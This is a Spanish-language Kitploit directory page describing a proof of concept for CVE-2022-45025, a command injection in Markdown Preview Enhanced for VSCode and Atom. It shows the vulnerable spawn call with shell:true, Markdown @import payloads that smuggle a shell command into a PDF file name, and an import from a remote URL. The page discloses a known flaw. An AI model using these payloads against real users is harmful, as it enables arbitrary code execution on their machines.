Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-45025 — [PoC] Inyección de comandos a través de la importación de PDF en Markdown Preview Enhanced (VSCode, Atom) | Kitploit
Herramientas/GitHubGitHub/yuriisanin/cve-2022-45025
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Inyección de comandos a través de la importación de PDF en Markdown Preview Enhanced (VSCode, Atom)

Ver Repositorio
8817hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-45025

Inyección de comandos a través de la importación de PDF en Markdown Preview Enhanced (VSCode, Atom)

Descripción

La librería de herramientas Markdown Mume era vulnerable a inyección de comandos debido al uso del comando spawn con la opción {shell: true}. Esto podría permitir a un atacante lograr ejecución arbitraria de código engañando a la víctima para que abra un archivo Markdown especialmente diseñado usando VSCode o Atom. La librería alimenta el plugin Markdown Preview Enhanced tanto para VSCode como para Atom.

Snippet de código vulnerable:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Prueba de Concepto

El siguiente documento Markdown permite a un atacante ejecutar un comando arbitrario:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Alternativamente, el payload podría ejecutarse desde una fuente externa:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DEMO para VSCode y Atom en YouTube.

vscode-rce-poc-gif

Soporte

Puedes seguirme en Twitter, GitHub o YouTube.

Descargar herramienta